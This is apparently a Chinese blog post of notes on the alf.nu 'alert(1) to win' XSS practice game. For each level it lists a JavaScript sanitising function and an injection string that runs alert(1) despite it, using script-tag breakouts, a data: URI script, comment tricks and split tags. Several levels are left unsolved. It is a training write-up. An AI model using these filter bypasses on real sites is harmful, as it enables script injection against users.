XSS练习平台- https://alf.nu/alert1

https://alf.nu/alert1

 

参考：https://www.cnblogs.com/renzongxian/p/5617551.html

 

我目前的进度：https://alf.nu/alert(1)#accesstoken=Iq64Lxvg5sC0napbZrI7

看别人的答案做个一知半解，深感自己能力不足水平有限啊^_^!

 

Warmup

function escape(s) { 

    return '<script>console.log("'+s+'");</script>';

}

 

");alert(1)//

 

Adobe

function escape(s) {  

    s = s.replace(/"/g, '\\"');  

    return '<script>console.log("' + s + '");</script>';

}

我们发现过滤了 ”替换为\"

\");alert(1)//

 

JSON

function escape(s) {  

    s = JSON.stringify(s);  

    return '<script>console.log(' + s + ');</script>';

}

使用JSON.stringify（）过滤 "被替换为\"，  \被替换为\\

</script><script>alert(1)//

 

JavaScript

function escape(s) {  

    var url = 'javascript:console.log(' + JSON.stringify(s) + ')';  

    console.log(url);  

    var a = document.createElement('a');  

    a.href = url;  document.body.appendChild(a); 

    a.click();

}

 

%22),alert(1)//

 

Markdown

function escape(s) {  

    var text = s.replace(/</g, '&lt;').replace(/"/g, '&quot;');

  // URLs  

    text = text.replace(/(http:\/\/\S+)/g, '<a href="$1">$1</a>');

  // [[img123|Description]]  

    text = text.replace(/\[\[(\w+)\|(.+?)\]\]/g, '<img alt="$2" src="$1.gif">');  return text;

}

 

 

 

DOM

function escape(s) {

    // Slightly too lazy to make two input fields.  

    // Pass in something like "TextNode#foo"  

    var m = s.split(/#/);

 

    // Only slightly contrived at this point.  

    var a = document.createElement('div');  

    a.appendChild(document['create'+m[0]].apply(document, m.slice(1)));  

    return a.innerHTML;

}

 

Comment#><script>alert(1)</script><!

 

 

Callback

function escape(s) {

    // Pass inn "callback#userdata"  

    var thing = s.split(/#/);

 

    if (!/^[a-zA-Z\[\]']*$/.test(thing[0])) return 'Invalid callback';  

    var obj = {'userdata': thing[1] };  

    var json = JSON.stringify(obj).replace(/</g, '\\u003c');  

    return "<script>" + thing[0] + "(" + json +")</script>";

}

'#';alert(1)//

 

Skandia

function escape(s) {  return '<script>console.log("' + s.toUpperCase() + '")</script>';}

 

</script><script src=data:text/html,%61%6c%65%72%74(1)>

 

Template

function escape(s) {  

    function htmlEscape(s) {    

        return s.replace(/./g, function(x) {       

            return { '<': '&lt;', '>': '&gt;', '&': '&amp;', '"': '&quot;', "'": '&#39;' }[x] || x;       

     });

  }  

 

function expandTemplate(template, args) {    

    return template.replace(

        /{(\w+)}/g,

         function(_, n) {

            return htmlEscape(args[n]);

         });

  }

    return expandTemplate(

    "                                                \n\

      <h2>Hello, <span id=name></span>!</h2>         \n\

      <script>                                       \n\

         var v = document.getElementById('name');    \n\

         v.innerHTML = '<a href=#>{name}</a>';       \n\

      <\/script>                                     \n\

    ",

    { name : s }

  );

}

 

 

JSON ][ 

function escape(s) {  

    s = JSON.stringify(s).replace(/<\/script/gi, '');  

    return '<script>console.log(' + s + ');</script>';

}

 

</scr</scriptipt><script>alert(1);//

 

 

Callback ][

function escape(s) {

  // Pass inn "callback#userdata"

  var thing = s.split(/#/);

  if (!/^[a-zA-Z\[\]']*$/.test(thing[0])) return 'Invalid callback';

  var obj = {'userdata': thing[1] };

  var json = JSON.stringify(obj).replace(/\//g, '\\/');

  return "<script>" + thing[0] + "(" + json +")</script>";

}

 

'#';alert(1);<!-->

 

 

Skandia ][

function escape(s) {

  if (/[<>]/.test(s)) return '-';

 

  return '<script>console.log("' + s.toUpperCase() + '")</script>';

}

 

iframe 

function escape(s) {

  var tag = document.createElement('iframe');

 

  // For this one, you get to run any code you want, but in a "sandboxed" iframe.

  //

  // https://4i.am/?...raw=... just outputs whatever you pass in.

  //

  // Alerting from 4i.am won't count.

  s = '<script>' + s + '<\/script>';

  tag.src = 'https://4i.am/?:XSS=0&CT=text/html&raw='; + encodeURIComponent(s);

  window.WINNING = function() { youWon = true; };

  tag.setAttribute('onload', 'youWon && alert(1)');

  return tag.outerHTML;

}

？？？？

name="youWon"

 

TI(S)M

function escape(s) {

  function json(s) { return JSON.stringify(s).replace(/\//g, '\\/'); }

  function html(s) { return s.replace(/[<>"&]/g, function(s) {

                        return '&#' + s.charCodeAt(0) + ';'; }); }

  return (

    '<script>' +

      'var url = ' + json(s) + '; // We\'ll use this later ' +

    '</script>\n\n' +

    '  <!-- for debugging -->\n' +

    '  URL: ' + html(s) + '\n\n' +

    '<!-- then suddenly -->\n' +

    '<script>\n' +

    '  if (!/^http:.*/.test(url)) console.log("Bad url: " + url);\n' +

    '  else new Image().src = url;\n' +

    '</script>'

  );

}

if(alert(1)/*<!--<script>

利用注释/**/ 注释掉代码中间的一个<script>使得头一个<script>向下寻找</script>闭合，其中的代码都被认为是JavaScript代码得到执行

 

JSON Ⅲ

function escape(s) {

  return s.split('#').map(function(v) {

      // Only 20% of slashes are end tags; save 1.2% of total

      // bytes by only escaping those.

      var json = JSON.stringify(v).replace(/<\//g, '<\\/');

      return '<script>console.log('+json+')</script>';

      }).join('');

}

if(alert(1)/*<!--<script>